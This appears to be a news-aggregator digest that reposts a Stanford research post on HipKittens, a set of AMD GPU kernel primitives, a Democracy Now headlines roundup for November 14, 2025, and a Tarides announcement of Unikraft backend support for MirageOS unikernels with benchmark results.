Pat Patterson is the chief technical evangelist at Backblaze. Over his three decades in the industry, Pat has built software and communities at Sun Microsystems, Salesforce, StreamSets, and Citrix. In his role at Backblaze, he creates and delivers content tailored to the needs of the hands-on technical professional, acts as the “voice of the developer” on the Product team, and actively participates in the wider technical community. Outside the office, Pat runs far, having completed ultramarathons up to the 50 mile distance. Catch up with Pat via Bluesky or LinkedIn.

AMD GPUs go brrr

Lobsters
hazyresearch.stanford.edu
2025-11-14 13:07:11
Comments...
Original Article

Team: William Hu, Drew Wadsworth, Sean Siddens, Stanley Winata, Daniel Fu, Ryan Swann, Muhammad Osama, Christopher Ré, Simran Arora
Links: Arxiv | Code

AI is compute hungry. So we've been asking: How do we build AI from the hardware up? How do we lead AI developers to do what the hardware prefers?

AMD GPUs are now offering state-of-the-art speeds and feeds. However, this performance is locked away from AI workflows due to the lack of mature AMD software . We share HipKittens, an opinionated collection of programming primitives to help developers realize the hardware's capabilities: optimized register tiles, 8-wave and 4-wave kernel patterns instead of wave-specialization to schedule work within processors, and chiplet-optimized cache reuse patterns to schedule work across processors.

Check out part one of this series for an intro to HipKittens, and check out this post for a technical deep dive.

What do AMD CDNA GPUs look like? A lay of the land.

An AMD MI355X GPU has 256 processors called “compute units” (CUs) and a CU contains four SIMDs. A SIMD has different execution units. A 64-thread “wave” (contrasting a 32-thread warp on NVIDIA) occupies a single SIMD. We show the MI355X memory hierarchy below.

Unsurprisingly, making AMD GPUs go brr boils down to keeping the “matrix cores” (tensor cores on NVIDIA) fed. There are a few differences in how we think about this hardware:

  1. What it's not. An MI355X has 70% the SRAM of a B200 (165KB instead of 228KB), lacks asynchronous matrix multiplication instructions that operate on inputs in shared or tensor memory (wgmma, tcgen05), lacks register reallocation (the ability for some waves to give their registers to others), lacks tensor memory acceleration (dedicated hardware for global memory access), and lacks first class mbarrier primitives (for fine-grained synchronization).
  2. What it is. On the other hand, AMD GPUs have a 2x larger register file per processor than the B200 and offer 60% more processors per GPU (256 compute units versus 160 streaming multiprocessors). AMD offers tiny and fine-grained matrix core instructions, while NVIDIA tensor core instructions are generally called with large input operands. AMD has TMA-like direct global-to-shared-memory loads via buffer_load_dword instructions, which bypass the register file.
  3. Towards chiplet architectures. AMD is also leading the charge in the shift from monolithic grids to chiplets. AMD splits the 256 processors into 8 chiplets called “XCDs” of 32 CUs. NVIDIA B200s include 2 chips. The AMD cache is disaggregated: an AMD XCD has a private L2 cache and there is an extra last level cache (LLC) that sits between the L2 and HBM memory.
Spec | NVIDIA B200 SXM5 | AMD MI355X OAM
BF16 matrix / tensor | 2.2 PFLOPs | 2.5 PFLOPs
MXFP8 matrix / tensor | 4.5 PFLOPs | 5.0 PFLOPs
MXFP6 matrix / tensor | 4.5 PFLOPs | 10.1 PFLOPs
MXFP4 matrix / tensor | 9.0 PFLOPs | 10.1 PFLOPs
Memory capacity | 180 GB | 288 GB
Memory bandwidth | 8.0 TB/s | 8.0 TB/s

Table 1: Hardware overview. Peak memory and compute speeds for the latest generation GPU platforms.

These differences impact the ways in which we design kernels on AMD.

  1. Optimized memory access: Of course this matters on NVIDIA too, but AMD’s layouts, HIPCC compiler limitations, and (undocumented) quirky behaviors of different I/O instructions yield new challenges.
  2. Scheduling within processors: We need to rely on our register file and small matrix core instructions instead of shared memory and bulky wgmma/tcgen05 instructions to establish deep pipelines and hide memory costs. Wave specialization / producer consumer, which reigns supreme in NVIDIA kernels, is not the right answer on AMD.
  3. Scheduling across processors: We need to start thinking about NUMA effects at the cache level as we schedule work across thread blocks.

We walk through these three topics next.

HipKittens memory access patterns

As in ThunderKittens, in HK, developers program using tiles as the basic data structure. Tiles exist in shared or register memory, and are parametrized by a data type, size dimensions (a multiple of the matrix core instruction shape), and layout. HK provides a library of PyTorch-like functions that operate on tiles, for instance exp, mma, sub, add, and row_max compute ops, and load and store memory ops. A tile is collectively owned by threads in a wave (warp). The functions use template metaprogramming to generalize to different input tiles and are lightweight, directly wrapping assembly (PTX, CDNA ISA) and C++.

A memory layout determines how data elements map to thread ownership. A matrix core instruction expects a particular register layout depending on the data type and instruction shape. We also want to maximize the granularity and coalescing of global memory loads. Between registers and HBM, shared memory is split into banks (4-byte regions) that can serve data simultaneously. If threads from a wave request data from the same bank at the same time, their accesses are serialized; efficient kernels use “swizzle patterns” to organize data in a way that avoids these bank conflicts.

A few challenges for memory access in HK include:

  • Register scheduling: A core tenet of HK and TK is to give developers full control over register allocation by remaining C++ embedded. Compilers like Triton prevent register management altogether, but surprisingly we find that even the HIPCC compiler imposes severe limitations (no wonder AMD uses raw assembly!). 1 For instance, 4-wave (1-wave per SIMD) kernels compiled via HIPCC cannot use data held in certain types of registers as inputs to matrix instructions. This motivated us to add explicit register scheduling to HK, where developers pin specific registers when creating register tiles, effectively replacing the compiler’s register management capabilities. Developers thus have the control necessary to write peak performance kernels!
Learn more about explicit register scheduling

When a single wave is mapped per SIMD, the 512 registers are actually divided into 256 accumulator general purpose registers (AGPRs) and 256 vector general purpose registers (VGPRs). AGPRs have fundamental hardware limitations (e.g., vector arithmetic instructions cannot operate on them), but they can still crucially serve as the input or outputs for MFMA instructions. HIPCC, however, cannot generate code that uses AGPRs as input to MFMA instructions, leading to inefficient register management for register heavy workloads and redundant accvgpr_read/write instructions that move data between VGPRs and AGPRs.

  • Register layouts : NVIDIA tensor core layouts are regular – as we vary the data type or matrix shape, the layout is composed of an underlying “core matrix” structure. Thus, frameworks like TK and Gluon can apply a unified swizzling rule to avoid bank conflicts. However, AMD layouts differ significantly based on the data type and matrix shape. In fact, we show that it’s not possible to use a single swizzle pattern for all layouts. Further, sometimes we want to use multiple matrix shapes within the same kernel meaning that our swizzle pattern needs to be compatible with multiple types of layouts concurrently.

Figure: AMD register layouts for matrix instructions are less structured. NVIDIA layouts are all composed from an underlying core matrix structure.

  • Instruction phases: Waves (and NVIDIA warps) execute shared memory read/write instructions in phases, where a subset of threads in the wave access shared memory concurrently. NVIDIA instructions sequentially assign threads to phases (e.g., threads 0-7 in phase one, 8-15 in phase two). However, the phase groups are both non-sequential and differ entirely depending on the AMD CDNA memory instruction. For example, we found that a ds_read_b128 instruction reading 128 bits for each thread executes across 4 phases and has access to 64 banks. On the other hand, a ds_write_b64 instruction writing 64 bits for each thread executes across 4 phases and has access to only 32 banks. This behavior is not well documented even within AMD (! 😔), so we created and released solvers that reverse-engineer this behavior.
Learn why we can't use a single swizzle pattern for all AMD layouts.

Proof by contradiction:

To show why a single swizzling pattern is insufficient across different register tile shapes and layouts on AMD GPUs, consider the following two access patterns that surface in attention backwards:

  1. A row-layout 16x16 bf16 tile is written to shared memory. For this tile configuration, each thread holds 4 contiguous bf16 values - 64 bits in memory - and the most optimal instruction to issue this write is ds_write_b64. Avoiding bank conflicts for this access requires a swizzle pattern that respects the phase ordering and bank behavior previously mentioned. In this case, a swizzle that abides by these constraints is computed as offset ^= ((offset % 512) >> 7) << 3, where 64-bit chunks of memory are shifted around using an XOR swizzle (see the short sketch below).
  2. A row-layout 16x32 bf16 tile is read from shared memory. For this tile, each thread holds 8 contiguous bf16 values - 128 bits in memory - and the most optimal instruction to issue this read is ds_read_b128.

Regardless of the swizzling pattern required for ds_read_b128, the granularities of these two instructions are in conflict with each other. ds_read_b128 requires at least 128 bits of memory to be contiguous in shared memory, and the swizzle pattern for ds_write_b64 breaks memory apart into 64-bit chunks. As a result, different swizzling patterns need to be used for each.
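To make the arithmetic tangible, here is a small Python sketch of that 64-bit XOR swizzle (illustrative only, not HipKittens code); it treats offset as a byte offset into shared memory and, for illustration, assumes 32 four-byte banks.

def swizzle(offset: int) -> int:
    # The ds_write_b64 swizzle quoted above: XOR the 8-byte-chunk index with
    # the 128-byte row index inside each 512-byte window.
    return offset ^ (((offset % 512) >> 7) << 3)

def bank(offset: int, num_banks: int = 32) -> int:
    return (offset // 4) % num_banks

# Chunk 0 of four consecutive 128-byte rows: unswizzled they all land on bank 0;
# swizzled they spread across banks 0, 2, 4, 6.
for row in range(4):
    base = row * 128
    print(row, bank(base), bank(swizzle(base)))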

  • Address generation: AMD GPUs support direct asynchronous HBM to shared memory loads. Like TMA, these loads bypass the register file. The instruction takes as input per-thread addresses in HBM from which each thread will read data. While DSLs like TK directly swizzle the shared memory addresses, swizzling shared memory on AMD is instead accomplished by swizzling on the HBM addresses.

We provide developers with optimized tile layouts and memory access patterns by default within HK. Check out our paper to learn more about how we implement solutions to the above challenges.

HipKittens schedules within a processor

Ideally we would have simple, reusable patterns for scheduling the compute and memory within kernels that generalize across AI workloads. Wave specialization / producer consumer serves this purpose on NVIDIA, but what about on AMD?

Wave specialization struggles on AMD. Wave specialization is the dominant paradigm for achieving high occupancy on modern NVIDIA GPUs. Producer waves focus on memory movement while consumer waves focus on computation. This strategy underpins today’s state-of-the-art AI kernels—including FlashAttention-3 , COMET for MOE models , and high-performance GEMMs —as well as kernel DSLs such as ThunderKittens LSCF and TileLang .

But, we show that wave specialization underperforms on AMD due to the lack of register reallocation. On the MI355X, registers are statically divided across all waves. Producer waves that only need a few registers for address calculation are allocated more registers than they need; consumer waves cannot recoup those registers and must either spill registers to scratch memory or run at a lower arithmetic intensity. Both are disastrous for performance. Wave specialization limits the output tile size and makes our kernels more memory bound. For GEMMs, data loaded from memory is O(MK + NK) while compute is O(MNK). Decreasing the M or N in our per thread block output tile size lowers arithmetic intensity. 2
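To make that concrete with a rough per-block model (ignoring reuse across thread blocks): an M_t x N_t output tile over reduction dimension K loads (M_t + N_t)K elements and performs 2 M_t N_t K FLOPs, so

\[
\text{arithmetic intensity} \approx \frac{2\,M_t N_t K}{(M_t + N_t)\,K} = \frac{2\,M_t N_t}{M_t + N_t},
\]

which gives 256 FLOPs per element loaded for a 256x256 tile but only about 171 for a 128x256 tile; that drop is part of why the smaller-tile, wave-specialized configurations in the table below lag.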

Kernel | # P / # C | MFMA Shape | Output | TFLOPS
HK | 4 / 8 | 16×16×32 | 128×256 | 893
HK | 4 / 12 | 16×16×32 | 192×256 | 1278
HK | 0 / 8 | 16×16×32 | 192×256 | 1281
HK | 0 / 8 | 16×16×32 | 256×256 | 1605
TK | | 256×256×16 | 256×256 | 1538
CUTLASS | | 256×256×16 | 256×256 | 1570

Figure: Wave specialization underperforms on AMD GPUs. We benchmark AMD GEMMs on the MI355X using different numbers of producers (P) and consumer (C) waves. We report the matrix core intrinsic shape, output tile size computed per thread block, and TFLOPs (500 iterations warmup / 100 iterations measured). The CUTLASS GEMM is selected and tuned using the CUTLASS profiler tool on a B200 GPU.

As an aside, it might be surprising that AMD matches NVIDIA GEMM performance without all the bells and whistles of wgmma/tcgen05, producer consumer, TMA, mbarriers, large shared memory for deep multi-stage pipelining, etc. But… AMD has a 2x larger register file, and AMD’s smaller tensor core shapes (e.g., 16×16×32) provide an alternative path to establish deep pipelines by using finer-granularity load and compute stages.

Scheduling patterns for AMD. Our attempt to use wave specialization - a strategy that works well on NVIDIA GPUs - did not yield the expected speedups on AMD hardware. All is not lost! We found two scheduling patterns that consistently yield high occupancy on AMD GPUs, while using tile programming primitives (no raw assembly)!

  1. 8-wave ping-pong: We assign two waves per SIMD and at any given time, one is executing a cluster of memory instructions while the other wave executes a cluster of compute instructions. The waves swap at the end of cluster execution. With this approach, the developer can use large HK tiles since a thread issues many of the same instructions at once!
  2. 4-wave interleave: We assign one wave per SIMD and threads in this wave finely switch between issuing memory and compute operations. Here, the developer uses small HK tiles (essentially matching the size of the matrix core instruction shape) to achieve the fine-grained schedule.

These two patterns trade off programmability and performance: 8-wave and its large tile primitives lead to compact code, while 4-wave fine-grained interleaving expands code size. Surprisingly, the 8-wave schedule is sufficient to achieve SoTA-level performance on GEMMs and attention forwards. For GQA non-causal attention backwards, 8-wave also outperforms all AMD baselines by 1.8x, and our HK 4-wave further outperforms by 2.3x.

Figure: HK 8-wave ping pong pattern. We include a profiler snippet of the HK BF16 GEMM.

HipKittens schedules across processors

Modern GPUs are moving toward chiplet-based architectures, shifting away from traditional monolithic dies. AMD’s MI355X, for instance, integrates eight chiplets (XCDs), each with its own L2 cache, while NVIDIA’s B200 pairs two dies together. This shift enables higher scalability and yield but introduces a new performance challenge: disaggregated memory hierarchies. Each cluster of compute units now has local caches, and memory locality is no longer uniform across the chip.

On AMD GPUs, thread blocks are scheduled to chiplets in a round-robin fashion, meaning that the order in which blocks are launched—the grid schedule—directly affects how effectively data is reused in cache. Even perfectly tuned kernels can lose bandwidth if their grid layout is cache-unfriendly.

Figure: Visualization of three different grid schedules for the output matrix of a BF16 GEMM. The color represents the XCD assignment for the first set of thread blocks scheduled across the GPU's 256 processors. The top row is for a 9216×9216×9216 GEMM and the bottom row is for a 14592×14592×14592 GEMM. The leftmost column shows the assignments under a naive row-major layout, the middle column shows an approach that optimizes L2 cache reuse, and the right column shows the output from our algorithm, balancing L2 and LLC cache reuse.

Block Order | L2 % | LLC % | Mem. BW | TFLOPS
Matrix Multiply (M=N=K=9216)
Row-major | 55% | 95% | 15.1 TB/s | 1113
XCD (W 7/C 216) | 79% | 24% | 14.9 TB/s | 991
XCD (W 5/C 25) | 75% | 93% | 18.3 TB/s | 1145
Matrix Multiply (M=N=K=14592)
Row-major | 36% | 76% | 10.7 TB/s | 900
XCD (W 8/C 542) | 79% | 7% | 13.9 TB/s | 980
XCD (W 8/C 64) | 78% | 55% | 16.6 TB/s | 1068

Table: Performance results corresponding to the above chiplet swizzling figures.

Above, for a GEMM D = AB + C, we show different patterns for assigning thread blocks the responsibility of computing different tiles of the output matrix D. When thread blocks are scheduled in naive row-major order, cache reuse is suboptimal (≈55%) because blocks that share the same L2 cache often load different, non-overlapping tiles of A and B. Further, optimizing purely for L2 locality can cause each XCD to fetch disjoint portions of A and B, leading to redundant loads at the next cache level.

To address this, HipKittens introduces a chiplet-aware scheduling strategy that reorganizes the grid launch order to better exploit locality at both the L2 (per-chiplet) and LLC (shared) cache levels for GEMM workloads. The key idea is to group thread blocks that operate on nearby regions of the output matrix so that they naturally reuse overlapping tiles of input data across cache hierarchies.
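As a rough illustration of the idea (emphatically not HipKittens' actual scheduler), here is a Python sketch that remaps launched block indices so that blocks landing on the same XCD, which the hardware assigns round-robin, compute a contiguous patch of output tiles. NUM_XCDS and the row-major walk are illustrative assumptions, and balancing L2 reuse against LLC reuse (the right-hand column of the figure) takes a more careful grouping than this.

NUM_XCDS = 8  # MI355X-style chiplet count (assumption for illustration)

def tile_for_block(block_id: int, grid_m: int, grid_n: int) -> tuple[int, int]:
    # Hardware assigns thread blocks to chiplets round-robin.
    xcd = block_id % NUM_XCDS
    slot = block_id // NUM_XCDS
    # Give each XCD a contiguous chunk of output tiles (assumes the tile count
    # divides evenly by NUM_XCDS), walked in row-major order within the chunk.
    per_xcd = (grid_m * grid_n) // NUM_XCDS
    flat = xcd * per_xcd + slot
    return flat // grid_n, flat % grid_n

# Blocks 0, 8, 16, 24, 32 all land on XCD 0; remapped, they compute neighboring
# tiles of a 16x16 tile grid instead of being smeared across the whole output.
print([tile_for_block(b, 16, 16) for b in range(0, 40, 8)])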

Putting it all together

Let's take a look at a few kernels written in HK.

  1. First, here’s the hot loop of our attention forwards pass kernel (the entire kernel is ≈500 lines of code). We can see that the kernel uses HK's 8-wave ping pong schedule, where waves alternate between compute instruction clusters and memory clusters.
  2. Here's the core hot loop structure for our BF16 GEMM kernel. Again, we can see that waves alternate between compute clusters and memory clusters using HK's 8-wave ping pong schedule.

Multi-silicon AI is coming!

HipKittens delivers competitive performance on AMD CDNA3 and CDNA4 through three key insights: optimized memory access, AMD-centric wave scheduling patterns within a processor, and chiplet-aware grid scheduling across processors to exploit AMD's disaggregated cache hierarchy. Our kernels consistently achieve peak performance amongst AMD baselines across workloads (and compete with peak Blackwell kernels as well).

Realizing AI's full potential requires diverse, open hardware. 1 Today, that means making AMD GPUs truly accessible.

We want more AI in the world. AI has relied on and innovated on a single hardware provider, but we need to be able to use and experiment with all the compute we can. We need to be able to use the fastest hardware out there. We’re happy to help address these problems with HipKittens!

Figure: Surfing towards multi-silicon AI!

Links : Arxiv | Code

Headlines for November 14, 2025

Democracy Now!
www.democracynow.org
2025-11-14 13:00:00
Hegseth Announces “Operation Southern Spear” to Target “Narco-Terrorists” Across Hemisphere, 900,000 Palestinians Face Flood Risk as Heavy Rains Compound Gaza’s Misery, Israeli Forces Kill Two Palestinian Children in Raid Near Hebron as Settlers Set Fire to Mosque, Russ...
Original Article

Headlines November 14, 2025

Watch Headlines

Hegseth Announces “Operation Southern Spear” to Target “Narco-Terrorists” Across Hemisphere

Nov 14, 2025

Defense Secretary Pete Hegseth has announced “Operation Southern Spear”—a military campaign he said would target “narco-terrorists” across the Western Hemisphere. Hegseth’s announcement on social media came as the Pentagon said it had blown up another boat in the Caribbean Sea, reportedly killing four people aboard. It’s the 20th such strike, bringing the reported death toll to 80 people. The Pentagon claims the boats were carrying drugs, but officials have acknowledged they don’t know who has been killed. The attacks have been condemned as unlawful extrajudicial killings by the U.N.’s human rights chief, governments including Mexico and Colombia, the European Union, and U.S. lawmakers, among others.

Meanwhile, Secretary of State Marco Rubio has denied reports by CNN that the United Kingdom has stopped sharing intelligence on drug trafficking vessels over concerns about the US strikes.

Marco Rubio: “I did see a CNN report yesterday. I’m not going to go into great detail and to say that, it’s a false story, it’s a fake story.”

900,000 Palestinians Face Flood Risk as Heavy Rains Compound Gaza’s Misery

Nov 14, 2025

In Gaza, officials warn more than 900,000 displaced Palestinians face the risk of flooding as a storm system brings heavy rains and colder temperatures to a region where Israeli attacks have left 85 percent of road, water and sewage networks damaged or destroyed. Municipal authorities warn entire neighborhoods are at risk of being flooded by overflow from sewage stations left damaged from Israeli attacks or unable to operate due to a lack of fuel.

Israeli Forces Kill Two Palestinian Children in Raid Near Hebron as Settlers Set Fire to Mosque

Nov 14, 2025

In the occupied West Bank, Israeli forces shot and killed two Palestinian boys in a village north of Hebron and then seized their bodies. Separately, three Palestinians, including a 14-year-old child, were injured after Israeli forces fired on them during a raid southeast of occupied East Jerusalem. This comes amid a record wave of violent attacks by Israeli settlers on Palestinians during this year’s olive harvest. On Tuesday, masked Israeli settlers stormed a dairy plant near the town of Beit Lid, setting fire to vehicles; and on Thursday settlers set fire to the Hajja Hamida Mosque in the Palestinian village of Deir Istiya. This is local activist Nazmi Salman.

Nazmi Salman: “This attack comes within the framework of the declared war against the Palestinian people by settlers with the support of the occupation government. This attack violated the sanctity of places of worship and mosques. There were racist slogans written on the northern walls of the mosque.”

Russian Attacks on Ukraine Kill at Least 6 in Kyiv, 2 in Odesa Region

Nov 14, 2025

In Ukraine, at least six people were killed and 30 others injured as Russia launched a massive overnight assault on nearly every district of the capital, Kyiv. Officials said Russia’s attack involved 430 drones and 18 missiles, making it one of the biggest on Ukraine’s capital since Russia’s full-scale invasion in 2022. Many of the attacks struck residential high-rise buildings, scattering debris and sparking huge fires.

Survivor: “I was terrified, so terrified I didn’t know what to do first. Should I rescue myself and my child? Or should I run to help others because many people were screaming and needed help.”

Russian drones also struck Ukraine’s southwestern Odesa region, killing at least two people. Meanwhile, Russian officials say at least one person was injured when Ukraine launched drone attacks on Russia’s Belgorod region, and President Volodymyr Zelensky said his forces had fired long-range cruise missiles into Russia.

This all comes as Zelensky responded to a growing corruption scandal by firing Ukraine’s Justice and Energy ministers, who are accused of taking part in a massive bribery scheme.

Trump Administration Says It May Never Report October’s Inflation and Job Loss Data

Nov 14, 2025

Here in the United States, many food banks are reporting record demand, even after the longest government shutdown came to an end with a promise to restore SNAP food assistance benefits that the Trump administration withheld beginning on Nov. 1. A tally by the Associated Press found about two-thirds of states had issued only partial benefits or none at all before the government shutdown ended late Wednesday.

Meanwhile, the White House says the Bureau of Labor Statistics may never release October data on inflation and job losses, blaming the government shutdown. Data from the private sector firm ADP show the US economy lost about 11,000 jobs per week through late October.

Federal Agents Release Chicago Teacher Arrested by ICE at Child Care Center

Nov 14, 2025

Federal agents in Chicago have released preschool teacher Diana Santillana Galeano, a mother of two from Colombia whose arrest by ICE drew international outrage. Her arrest—in front of parents and children by federal agents who did not produce a warrant—came even though she had authorization to work in the day care center and had undergone a background check. She’s returning to work today at the Rayito de Sol Spanish Immersion Early Learning Center.

Trump Administration to Deploy Border Patrol to Charlotte and New Orleans

Nov 14, 2025

Border Patrol chief Gregory Bovino has reportedly left Chicago and will travel to North Carolina to oversee a new immigration crackdown in the city of Charlotte. Local officials including the Mecklenburg County sheriff say they were given no advance warning of the deployment. The Trump administration is also reportedly planning to surge federal agents in New Orleans, Louisiana.

US Bishops Condemn “Dehumanizing Rhetoric and Violence” of Trump’s Mass Deportation Campaign

Nov 14, 2025

Image Credit: U.S. Conference of Catholic Bishops

The United States Conference of Catholic Bishops has rebuked the Trump administration over its mass deportation policies, calling for an end to what it called “dehumanizing rhetoric and violence.” The bishops issued their statement after a nearly unanimous vote at their annual fall meeting in Baltimore. This is the conference’s general secretary, Rev. Michael JK Fuller.

Rev. Michael JK Fuller: “In cities across the United States, our migrant brothers and sisters, many of them our fellow Catholics, face a culture of fear, hesitant to leave their homes and even to attend church for fear of being randomly harassed or detained. Holy Father, please know that the bishops of the United States, united in our concern, will continue to stand with migrants and defend everyone’s right to worship free from intimidation.”

At the same meeting, US bishops voted in favor of a ban on gender-affirming care for transgender patients at Catholic hospitals.

US Issues New Visa Restrictions Discriminating Against People With Medical Conditions

Nov 14, 2025

Image Credit: U.S. Customs and Border Protection

The Trump administration has issued new visa restrictions for foreigners and immigrants seeking to visit or live in the United States. Under the latest directive, applicants may be denied a U.S. visa over certain medical conditions such as diabetes or obesity, and lack of economic resources and assets. The State Department has reportedly directed embassy and consular staff to rigorously vet visa applicants to demonstrate they will not seek any public benefits, including food aid, from the U.S. federal government, saying such people could become a “public charge” and drain U.S. resources. Immigration rights advocates have denounced the measure as “dangerous,” saying it will further curtail the already-limited legal pathways for people to come to the U.S.

Spaceflight Firm Founded by Jeff Bezos Lands First Stage of Giant Rocket, Challenging Musk’s SpaceX

Nov 14, 2025

Image Credit: Blue Origin

The rocket company founded by Amazon multi-billionaire Jeff Bezos has successfully landed the first stage of its giant new launch vehicle, in a major challenge to Elon Musk’s SpaceX, which dominates the commercial space industry. Blue Origin’s New Glenn rocket took off from Cape Canaveral Space Force Station on Thursday afternoon carrying a pair of NASA space probes bound for Mars. By successfully landing its booster stage on a drone ship downrange, Blue Origin seeks to dramatically cut the cost of launching satellites to Earth orbit and beyond. That’s central to plans by Jeff Bezos to build a constellation of internet satellites to compete with Elon Musk’s Starlink, which has about 9,000 operational satellites on orbit.

Katie Wilson Wins Seattle Mayor’s Race After Insurgent Campaign Demanding Affordability

Nov 14, 2025

Image Credit: Wilson For Seattle

In Seattle, first-term mayor Bruce Harrell has conceded defeat in his reelection fight against community organizer Katie Wilson, who campaigned on a message of affordability in a city where the cost of living has soared. Wilson’s platform calls for progressive taxation to raise revenue from the wealthiest households and corporations to pay for affordable housing and social programs benefiting families. Wilson spoke to reporters Thursday after mayor Harrell conceded.

Katie Wilson: “I want everyone in this great city of ours to have a roof over their head. I want universal child care and free K through 8 summer care. I want world-class mass transit. I want great, safe public spaces where kids can run around with abandon. I want stable, affordable housing for renters. I want social housing. I want much more land and wealth to be owned and stewarded by communities instead of corporations. I want a robust economy with thriving small businesses, great living wage jobs, and strong rights for workers.”

Workers Strike at Dozens of Starbucks Stores Across U.S. to Demand Union Contracts

Nov 14, 2025

More than 1,000 workers at 65 Starbucks stores across the United States held a one-day strike Thursday to protest Starbucks’s campaign of union busting and its refusal to negotiate union contracts. The baristas held the action on “Red Cup Day,” typically one of Starbucks’s busiest days of the year. Starbucks Workers United calls the company one of the most egregious violators of US labor law in modern history, with the National Labor Relations Board finding over 500 labor law violations; another 700 pending unfair labor practice charges have yet to be litigated. This is Rey Shao, a 23-year-old barista at a Starbucks store in Manhattan.

Rey Shao: “I’m putting in overtime every week just so I could afford my rent, so I can afford bills. It’s crazy that we’re working a full-time job, and I still can’t afford to pay the basic necessities I need to live. And meanwhile, our CEO is making $96 million, and he… for only four months of work, and meanwhile our CEO is riding in a private jet, and I’m barely able to afford the MTA fare to go to work.”

On Thursday, New York Mayor-elect Zohran Mamdani wrote online, “While workers are on strike, I won’t be buying any Starbucks, and I’m asking you to join us. Together, we can send a powerful message: No contract, no coffee.”

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Announcing Unikraft Support for MirageOS Unikernels

Lobsters
tarides.com
2025-11-14 12:57:01
Comments...
Original Article

We are happy to announce the release of Unikraft backend support for MirageOS unikernels! Our team, consisting of Fabrice Buoro, Virgile Robles, Nicolas Osborne, and me (Samuel Hym), has been working on this feature for the past year. We’re excited to bring it to the community and hope to see many people try it out.

This post will give you an overview of the release, including some background on Unikraft and performance graphs. You will already be familiar with most of this if you read our post on Discuss.

What is Unikraft and Why Did We Choose It?

Unikraft is a unikernel development kit: a large collection of components that can be combined in any configuration that the user wants, in the unikernel tradition of modularity. Unikraft's scope is larger than that of Solo5 (a backend that MirageOS also supports). It aims to make it easy to turn any Unix server into an efficient unikernel.

In fact, the initial motivation behind exploring Unikraft as a MirageOS backend was to experiment and see what performance levels we could reach. We were particularly excited about using their Virtio-based network interface, as virtio is currently only implemented for one specific x86_64-only backend in Solo5. Some of the immediate performance differences we observed are detailed further down, but performance is not all we hope to gain from the Unikraft backend in the long run.

Unikraft is on the road to being multicore compatible (i.e., having one unikernel using multiple cores). While this is not ready yet and significant effort is needed to get there, it means that the MirageOS backend will eventually benefit from these efforts and support the full set of OCaml 5 features.

Furthermore, the Unikraft community (which is quite active) is experimenting with a variety of other targets, such as bare-metal for some platforms or new hypervisors (e.g. seL4). Any new target Unikraft supports can then be supported ‘for free’ by MirageOS too. For example, the Unikraft backend has already resulted in Firecracker being a new supported virtual machine monitor (VMM) for MirageOS.

Lastly, since Unikraft is POSIX-compatible (for a large subset of syscalls), it has the potential to enable MirageOS unikernels to embed OCaml libraries that have not been ported yet. This compatibility could be especially useful for large libraries which are hard to port (owl comes to mind).

How Does Unikraft Support Work?

Adding the new MirageOS backend required that we create or modify a series of components:

Using Unikraft with a QEMU or a Firecracker backend is as simple as choosing the unikraft-qemu or the unikraft-firecracker target when configuring a unikernel.

The OCaml/Unikraft Cross Compiler

To build the OCaml cross compiler with Unikraft, we used the Unikraft core, Unikraft lib-musl, and musl. The musl library is the C library recommended by Unikraft for building programs using the POSIX interface. The combination made it easy to build the OCaml 5 runtime, particularly because it provided an implementation of the pthread API, which is now used in many places in the runtime. It could also potentially make it easier to port some libraries that depend on Unix to work on Unikraft backends.

The OCaml cross compiler builds upon the work that has been upstreamed to ease the creation of cross compilers, using almost the same series of patches as ocaml-solo5. So the only compiler versions currently supported for OCaml/Unikraft are OCaml 5.3 and 5.4. All the patches have been upstreamed to OCaml, so no patches should be required for OCaml 5.5.

Note that we didn’t go with the full standard Unikraft POSIX stack, which includes lwIP to provide network support. We had a prototype at some point relying on lwIP to validate our progress on other building blocks, but it raised many incompatibility issues with the standard MirageOS network stack, so we dropped support for lwIP for now. Instead, we developed the libraries required to plug the MirageOS stacks into the low-level interfaces provided by the Unikraft core.

The New MirageOS Libraries for Unikraft Support

Unikraft support comes with packages using the standard names, mirage-block-unikraft and mirage-net-unikraft , to support the block and network devices. These libraries are implemented directly on top of the low-level Unikraft APIs, and therefore use virtio on both QEMU and Firecracker VMMs.

To evaluate the quality of the implementations for these devices, we ran a couple of small benchmarks using OCaml 5.3 and Unikraft 0.18.0. You can find the benchmarks (including the unikernels along with some scripts to set them up and run them) in the benchmarks directory in @Firobe’s fork of mirage-skeleton, benchmarks branch .

Network Device

To measure the performance of the network stack, we tweaked the simple network skeleton unikernel to compute statistics and used a variable number of clients, all sending 512 MB of null bytes. We ran this benchmark on a couple of x86_64 laptops and on an LX2160 aarch64 board, all running a GNU/Linux OS.
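The exact benchmark scripts are in the repository linked above; as a rough illustration of the client side (the address and port here are hypothetical), a single client boils down to something like:

$ dd if=/dev/zero bs=1M count=512 | nc 10.0.0.2 8080   # 512 MB of null bytes; run several in parallel to vary the load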

We have observed a lot of variability in the performance of the solo5-spt unikernel (sometimes better, sometimes worse than unikraft-qemu ) depending on the actual computer used, so these measurements should be taken with a grain of salt.

On two different x86_64 laptops: [Charts: Unikraft, solo5-spt and solo5-hvt in decreasing performance order on one laptop; on the other, Unikraft or solo5-spt is fastest depending on the number of connections, with solo5-hvt slower.]

On the LX2160 aarch64 board: [Chart: Unikraft, solo5-spt and solo5-hvt, in decreasing performance order.]

Block Device

To measure the performance of the block devices, we wrote a simple unikernel copying data from one disk to another. The performance of unikraft-qemu is lower than solo5-hvt for small buffer sizes, but the situation improves with larger buffer sizes. We only ran this benchmark on an x86_64 laptop, as there is currently an issue with using two block devices on aarch64 with Unikraft. [Chart: solo5-spt is fastest for small buffer sizes, Unikraft-QEMU is fastest for larger buffer sizes; Unikraft-Firecracker and solo5-hvt are slower.]

It is worth mentioning that I/Os can be parallelised, which also yields a significant performance boost. Indeed, mirage-block-unikraft can leverage the parallelised virtio backend of QEMU and Firecracker, so I/Os are no longer limited to what the hardware supports in terms of parallelism and sector size.

Current Limitations

  1. In our tests, only Linux appears to be well supported for compiling Unikraft at the moment, so we have restricted our packages to that OS for now.
  2. Unikraft supports various backends. So far, we have only added and tested support for its two major ones: QEMU and Firecracker.

Try it Out

To try the new Unikraft backend for MirageOS, you need to use an OCaml 5.3 or 5.4 switch, so that you can install mirage and the OCaml/Unikraft cross compiler. The short version could be:

$ opam switch create unikraft-test 5.4.0 # or 5.3.0, and if needed
$ opam install mirage ocaml-unikraft-backend-qemu ocaml-unikraft-x86_64

